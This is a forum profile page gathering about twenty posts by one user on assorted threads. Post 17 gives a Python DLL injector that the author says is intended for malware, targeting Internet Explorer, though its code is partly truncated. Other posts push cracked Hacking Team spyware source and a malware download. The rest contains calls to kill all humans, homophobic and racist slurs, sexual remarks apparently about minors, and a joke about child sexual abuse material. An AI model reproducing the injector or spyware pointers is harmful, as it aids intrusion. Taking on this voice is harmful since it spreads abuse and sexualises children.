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Posts by Sophie

  1. Sophie Pedophile Tech Support
    "Kill them. Kill every filthy human being on Earth. Slaughter them like the animals they are."

    Le veau d’'or est vainqueur des dieux! Dans sa gloire dérisoire, le monstre abject insulte aux cieux. Il contemple, ô rage étrange. A ses pieds le genre humain, se ruant, le fer en main, dans le sang et dans la fange.
  2. Sophie Pedophile Tech Support
    i dont like torrenting because most torrents are either broken, require additional software, or contain embedded malware

  3. Sophie Pedophile Tech Support
    I find you two… amusing.

    I know, i'm fun as fuck.
  4. Sophie Pedophile Tech Support
    I was about to say murder but 'craglanard' is good too.
  5. Sophie Pedophile Tech Support
    Where is Magus anyway. Not that i care, he's a raging homosexual.
  6. Sophie Pedophile Tech Support
    I'd only use it to get away with murder. Otherwise i'd probably sell it.
  7. Sophie Pedophile Tech Support
    psychologically scarred mothafuckas.

    The best kind of mothafucka.
  8. Sophie Pedophile Tech Support
    Hacking Team's flagship software Galileo-RCS has been cracked. Researchers at Hyperion have managed to get the software to run without the required liscense and hardware security dongle. And now so can you should you so desire.

    Here's all the RCS source code.

    RCS Backend DB.
    RCS External Libraries.
    RCS Console
    RCS Common Components
    RCS Collector
    RCS Backdoor
    RCS Agent for Windows 32
    RCS Agent for Windows 64
    RCS Agent for Linux
    RCS Agent for Mac
    RCS Agent for iOS
    RCS Agent for Blackberry
    RCS Agent for Symbian
    RCS Agent for Android
    RCS Agent for Windows Mobile

    You can simply pull the files/installer directly from the data dump the torrent for which can be found here.

    Or here.
  9. Sophie Pedophile Tech Support
    Look what i have, you can thank me later. As a general protip when working with 'random' malware, i'd compile/build in VM just to be safe.!DpVQlYyA!PZYAc286o...VErK2H2RJ5w368
  10. Sophie Pedophile Tech Support
    I can't get anyone to argue with me in real life anymore, everyone is fed up with my shit, so I take it out on you fucks. That's pretty much it.

    I'd argue with you all day IRL, Sophie doesn't afraid of anything.
  11. Sophie Pedophile Tech Support

    no shit?

    I guess I forgot how to fucking read.

    I mean, it's not like you didn't type the exact same thing to me, the other day….


    Forgive Malice, he is socially retarded.
  12. Sophie Pedophile Tech Support

    Means you lose by default.

    it's not like I am going to get through to any leftists anyway. they are literally brainwashed.

    Yee arguing with lanny about politics is an excersise in futility. I remember back on the fern i made an awesome argument about how in a anarcho-capitalist system monopolies can't exist which still turned into a two page discussion lol. In conclusion i'll leave this thread with this.

    If I had to boil it down to a handful of key points, they would be these: One, each human being, to use John Locke’s formulation, has a property in his own person; Two, there ought to be a single moral code binding all people, whether they are employed by the State or not; and three, society can run itself without central direction. From the original property one enjoys in his own person we can derive individual rights, including property rights. When taken to its proper Rothbardian conclusion, this insight actually invalidates the State, since the State functions and survives on the basis of systematic violation of individual rights. Were it not to do so, it would cease to be the State.
    In violating individual rights, the State tries to claim exemption from the moral laws we take for granted in all other areas of life. What would be called theft if carried out by a private individual is taxation for the State. What would be called kidnapping is the military draft for the State. What would be called mass murder for anyone else is war for the State. In each case, the State gets away with moral enormities because the public has been conditioned to believe that the State is a law unto itself, and can’t be held to the same moral standards we apply to ourselves.

    Thus the state and all it's programs/policies are fundamentally invalid, especially policies/programs that require big government, like welfare(i.e socialist policies).
  13. Sophie Pedophile Tech Support
  14. Sophie Pedophile Tech Support
    IDK bro, young pussy is pretty tight as is.
  15. Sophie Pedophile Tech Support
    every thing I post is bait, I just like to argue.

    You've just single-handedly discredited every argument you made in this thread with this sentence. Also, while i am right leaning myself, in all fairness lanny did, as always a good job of defending his position.
  16. Sophie Pedophile Tech Support

    This is good, funny how for all the calling people 'Totse traitor power hungry faggots' he was nothing but a mini hitler himself when he was a mod. Not to mention the bitch move he pulled stealing member emails etc, which he would later use to pretend he'd 'hacked' some accounts.


    No SpectraL fuck you, we all know what really went down just the fact that you won't admit it doesn't change a thing.
  17. Sophie Pedophile Tech Support
    Avast! I have returned with another python thread. So i was reading about malware and what not and i came upon some articles that had to do with dll injection. Interested, i set out to create my own dll injector. After some research this is what i came up with.

    Since this is intended for use in malware we're just going to quietly inject the dll we have specified into the internet explorer process. This script assumes you have your dll ready to go under the name mydll.dll in the same folder as the script(Presumably in a directory where it was downloaded with your malicious executable or something of the sort).

    What's more the script automatically gets the proper Process ID of internet explorer and uses it to inject our DLL.

    from win32com.client import GetObject
    from ctypes import *
    import sys, ctypes, os, string, time

    Wmi = GetObject('winmgmts:')
    processes = Wmi.InstancesOf('Win32_Process')
    # Get the internet explorer process
    explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
    # Grab its Pid
    PID = explorer[0].Properties_('ProcessId').Value

    # Get DLL path
    file = 'mydll.dll'

    path = os.path.dirname(__file__)
    DLL_PATH = os.path.join(path, file)

    # Define constants we use
    PAGE_RW_PRIV = 0x04
    VIRTUAL_MEM = 0x3000

    #CTYPES handler
    kernel32 = windll.kernel32

    def dll_inject(PID,DLL_PATH):
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)

    if hProcess == None:


    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
    bool_Written = c_int(0)


    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")

    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")

    thread_id = c_ulong(0) # for our thread id

    if not kernel32.CreateRemoteThread(hProcess,

    print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value

    Simply comment out the last 'else' and 'print' and it's ready for use. The reason i kept it in is for testing purposes
  18. Sophie Pedophile Tech Support
    Dosed four 50mg crushed up Tramadol .I don't see the weakness everyone was talkin about. Itching, nodding, nauseous, etc.. Euphoric is an understatement. I tried laying down but the head to toe body waves are just too intense….I'm just out of order for the momennt

    Let me guess, you've never done any of the 'harder' opiates?
  19. Sophie Pedophile Tech Support
    Nah, if the information is publicly available, like in the phonebook. Sharing it is perfectly legal.
  20. Sophie Pedophile Tech Support
    If it wasn't me, it would be somebody else. Old Darkie here just has an inferiority complex he needs to constantly feed, and soapbox and coddle. That's really all we have here. Psycho really isn't so much better. Pretty well cut from the same cloth. There will always be cowards on the Internet who's last and only resort is throwing PI and CP around just to try and come off looking like a somebody. Pretty sad and pathetic, I know, but hey, whatcha gonna do? They both need severe psychiatric treatment, like shock treatments or physical surgery.

    Throwing CP around? Why waste perfectly good CP like that?
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